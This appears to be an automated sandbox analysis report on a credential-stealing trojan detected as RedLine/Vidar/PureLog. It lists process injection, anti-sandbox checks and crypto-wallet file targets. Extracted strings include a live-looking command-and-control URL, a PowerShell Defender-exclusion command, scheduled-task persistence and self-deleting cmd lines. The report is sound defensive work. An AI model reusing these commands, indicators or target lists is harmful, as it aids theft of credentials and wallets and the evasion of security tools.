Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Code function: 0_2_00F6A7B3 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_00F6A7B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040B030 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	3_2_0040B030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004011E0 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,	3_2_004011E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040D320 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_0040D320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004164A0 wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,strtok_s,memset,lstrcat,strtok_s,PathMatchSpecA,wsprintfA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose,	3_2_004164A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00417550 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	3_2_00417550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040A530 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	3_2_0040A530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00416CF0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	3_2_00416CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00417140 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	3_2_00417140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040A980 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	3_2_0040A980

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_004168E0 GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlen,

3_2_004168E0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00410540 GetSystemInfo,wsprintfA,

3_2_00410540

Source: C:\ProgramData\CAFIJKFHIJ.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Data Exchange Service0
Source: CAFIJKFHIJ.exe, 00000009.00000002.2069666792.000000002537B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SystemHostDiagnostic Service HostWdiServiceHostWindows Connect Now - Config RegistrarwcncsvcWindows Connection ManagerWcmsvcWindows Biometric ServiceWbioSrvcBlock Level Backup Engine ServicewbengineWarpJITSvcWarpJITSvcWalletServiceWalletServiceWindows TimeW32TimeVolume Shadow CopyVSSHyper-V Volume Shadow Copy RequestorvmicvssHyper-V PowerShell Direct ServicevmicvmsessionHyper-V Time Synchronization ServicevmictimesyncHyper-V Guest Shutdown ServicevmicshutdownHyper-V Re
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.000000000459A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vboxservice
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmmouse.
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: -Hyper-V Remote Desktop Virtualization Service0
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VBoxMouse.
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.000000000459A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vboxguest.sys@n
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.000000000459A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vboxsf.sys
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.000000000459A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmmouse.sys@n
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VBoxSF.
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service0
Source: RegAsm.exe, 00000003.00000002.2042222099.000000000161B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.000000000459A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vboxmouse.sys
Source: RegAsm.exe, 00000003.00000002.2042222099.000000000161B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW(
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Program Files\VMware
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VBoxMouse.sys
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SbieDll.dllcmdvrt32.dllcmdvrt64.dllSxIn.dllcuckoomon.dllkernel32.dllwine_get_unix_file_nameSelect * from Win32_ComputerSystemManufacturerModelmicrosoft corporationVIRTUALvmwareballoon.netkvm.vioinputviofs.vioser.vmbusVMBusHIDhyperkbdJohn DoeMillermalwareCurrentUserSandboxJohnsonWDAGUtilityAccountVBoxMouse.VBoxGuest.VBoxSF.VBoxVideo.vmmouse.vboxogl.dllVMwareOracleVirtualBox Guest AdditionsvboxserviceVGAuthServicevmusrvcqemu-gaSELECT FROM Win32_PortConnector WHERE PNPDeviceID IS NOT NULLPNPDeviceIDACPI\PNP0501ACPI\PNP0502sysCritical Error1powershellrunas -Command Add-MpPreference -ExclusionPath '{0}'On0\screen.jpgscreen\.jpghashcum/get.phpPOST15sec30secrandom/zima.php?mine=ifelsexmrverusxmr+verusravenetcverus+ravenverus+etcxmr+ravenxmr+etcautoabcdefghjklmnoWin32_ProcessorProcessorId-Win32_BIOSSerialNumberWin32_DiskDriveSignatureWin32_BaseBoardWin32_VideoControllerNamex20x0000100x0000110x0000120x0000130x0000140x0000150x0000160x0000170x0000180x0000190x0000200x0000210x000022Select * from Win32_ProcessorNumberOfCoresPhormMid.croot\CIMV2SELECT Name FROM Win32_ProcessorUnknown.SELECT TotalPhysicalMemory FROM Win32_ComputerSystemTotalPhysicalMemoryMBSELECT * FROM Win32_VideoControllerAdapterRam bytes, Caption{0} \| {1}amdnvidiaintel(r){1}.root\SecurityCenterroot\SecurityCenter2SELECT * FROM AntivirusProductdisplayName, nonecpugpuramtagifelseldav/beep.phpfilezidBEBRIK.php.bat@echo offtimeout 3 > NULSTART "" ""CD DEL "" /f /qSoftware\Microsoft\Windows\CurrentVersion\Run\c2NodGFza3MuZXhl/create /sc MINUTE /mo 3 /tn "" /tr "" /fcmd/c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "/zima.php?mine=loader;yesnoSELECT CommandLine FROM Win32_Process WHERE ProcessId = CommandLineWin64uninstall.datMaZriCy9x3PTU2izdrO5UXbB6/ak0/HTSOSORRY.phpEOK.phpTOKYO.phpCHECK.phpOperaApp.datopera.datoperaupdater.datfirefox.dathelper.datZUHAN.exeWinForm.csZUHAN1264417905Program.csgetIQZuTsZDjUKE1BSBeT3eI2eNppHhTxrWHVRLTV+qqKRJfXz5YF6S4CcPXuxRE4gseXBURQy1iXbjM+H+NKkuXWDRKMShJJwZCKO9RytWz/5ZdYLrQZyzku1AQmyRjIiC5e1eA04pvrZro/7AHRKiZQ==Ybm4nNGEQQFuiwzVAnwg2oKZNBNG1Pg7s41+NkV0iE1YLnnXKndzwHC9OqR3X989tOJKaX+Vqz8j9MEC90wkEdp6Jf6k5I0KUs3KC3p7w5HWUIy2VybMXlvQVOxy4hzSkF6rsY8Edb9JvHItI1ogEBe7LPINPvdCPlNO7bA9H4pUee1omVXibOAxodmcNZYXh2WBLTmBMLyziyryS2x1W2sHQjv9mELHoexPN0wVwTzPMNWfit4EsVd8kbOQvN+cwz8wpHfkNldOXz9xAoaXj/wKfjNCkyytKClPPn6mQoN47qFu6FNCRfjl0WKAjUbtHw2jI1/J5uqNjl+XNnJzxlRomyc3pN0Hg+S0i2F7Y4wHxX4HTFFK4TLiGGe9ieHVQfUtXCXgEKIPb3qa29LGsg==[CHECK]http://185.209.162.40/apocalypseRussia,Georgia,Belarus,Armenia,Russia,Belarus,Azerbaijan,Kazakhstan,Kyrgyzstan,Armenia,Uzbekistan,Tajikistan Ef+uVd02PT3LwIeMBag5ow==onvbc.exe/zima.php?mine=XMR/zima.php?mine=OTHERgeneratorgenapzxdatid=application/x-www-form-urlencoded//RegSvcs.exe/zima.php?mine=RAVENngen.exe/zima.php?mine=ETC
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.000000000459A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vboxmouse.sys@n
Source: RegAsm.exe, 00000003.00000002.2042222099.00000000015BA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0Gb
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: !Hyper-V PowerShell Direct Service0
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.000000000459A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qemu-ga
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicshutdown
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VBoxGuest.
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.000000000459A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmusrvc
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $Hyper-V Time Synchronization Service0
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicvss
Source: RegAsm.exe, 00000003.00000002.2042222099.00000000015BA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.000000000459A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: c:\program files\vmware
Source: RegAsm.exe, 00000003.00000002.2042222099.000000000167F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\swqyH
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Service Interface0
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Heartbeat Service0
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VBoxGuest.sys
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VBoxSF.sys
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $Hyper-V Volume Shadow Copy Requestor0
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.000000000459A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vboxguest.sys
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.000000000459A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmmouse.sys
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.000000000459A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vboxsf.sys@n
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicheartbeat

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process information queried: ProcessInformation

Jump to behavior

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe

Code function: 0_2_00F62219 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00F62219

Contains functionality to dynamically determine API calls

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

3_2_004185A0

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Code function: 0_2_00F674F4 mov ecx, dword ptr fs:[00000030h]		0_2_00F674F4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Code function: 0_2_00F6BC8B mov eax, dword ptr fs:[00000030h]		0_2_00F6BC8B

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe

Code function: 0_2_00F6C701 GetProcessHeap,

0_2_00F6C701

Enables debug privileges

Source: C:\ProgramData\CAFIJKFHIJ.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Code function: 0_2_00F62219 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00F62219
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Code function: 0_2_00F62375 SetUnhandledExceptionFilter,	0_2_00F62375
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Code function: 0_2_00F64A20 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00F64A20
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Code function: 0_2_00F61D93 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00F61D93
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041A68F memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_0041A68F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041F768 SetUnhandledExceptionFilter,	3_2_0041F768
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041BBB7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_0041BBB7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C82B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_6C82B66C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C82B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_6C82B1F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C9DAC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_6C9DAC62

Source: C:\ProgramData\CAFIJKFHIJ.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write

Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe

0_2_00FAE7B5

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A

Jump to behavior

Searches for specific processes (likely to inject)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00411BD0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

3_2_00411BD0

Writes to foreign memory regions

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 423000	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 42E000	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 641000	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 642000	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 1022008	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\ProgramData\CAFIJKFHIJ.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" & del "C:\ProgramData\*.dll"" & exit	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\ProgramData\CAFIJKFHIJ.exe "C:\ProgramData\CAFIJKFHIJ.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 5	Jump to behavior

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe

Code function: 0_2_00F62485 cpuid

0_2_00F62485

Contains functionality to query locales information (e.g. system language)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,		3_2_00410370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoA,LocalFree,		3_2_004103E9

Queries information about the installed CPU (vendor, model number etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Queries volume information: C:\ProgramData\CAFIJKFHIJ.exe VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe

Code function: 0_2_00F62106 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00F62106

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00410220 GetProcessHeap,HeapAlloc,GetUserNameA,

3_2_00410220

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00410300 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,

3_2_00410300

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

AV process strings found (often used to terminate AV products)

Source: RegAsm.exe, 00000003.00000002.2042222099.000000000167F000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Yara detected PureLog Stealer

Source: Yara match	File source: 9.0.CAFIJKFHIJ.exe.d00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\Soft123[1].exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\CAFIJKFHIJ.exe, type: DROPPED

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe.f60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1632010609.0000000000F7B000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2039734186.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe PID: 6016, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7056, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: RegAsm.exe, 00000003.00000002.2042222099.00000000015B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia 